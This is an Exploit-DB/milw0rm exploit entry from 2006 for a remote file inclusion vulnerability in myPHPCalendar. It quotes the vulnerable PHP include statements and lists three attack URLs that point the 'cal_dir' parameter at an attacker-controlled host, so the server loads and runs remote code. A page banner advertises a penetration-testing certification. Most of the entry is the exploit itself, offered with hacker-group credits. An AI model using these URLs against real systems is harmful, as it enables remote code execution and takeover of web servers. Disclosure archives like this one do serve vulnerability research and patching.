myPHPCalendar 10192000b - 'cal_dir' Remote File Inclusion

EDB-ID:

3019




Platform:

PHP

Date:

2006-12-26


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

# script name : myPHPCalendar

# Script Downloads : http://freshmeat.net/projects/myphpcalendar/

# Web Site : http://myphpcalendar.sourceforge.net/

# Version : 10.1

# Risk : High

# Found By : Cr@zy_King

# Thanks : | eTNR | ApAci | Eno7 | TheHacker | Kormali46 | The_Bekir |
Metallicali | Liz0zim | ERNE | Swat_Hack | Commander | Soceita

# Code :
include($cal_dir."vars.inc");
include($cal_dir."prefs.inc");


#Vuln : http://[target]/admin.php?cal_dir=http://[attacker]/
http://[target]/contacts.php?cal_dir=http://[attacker]/
http://[target]/convert-date.php?cal_dir=http://[attacker]/


#Contact: crazy_king[at]turkusev[dot]com

# ---------------------------Satbirlikleri.Org&SiberAktif.Net-----------------------------

# milw0rm.com [2006-12-26]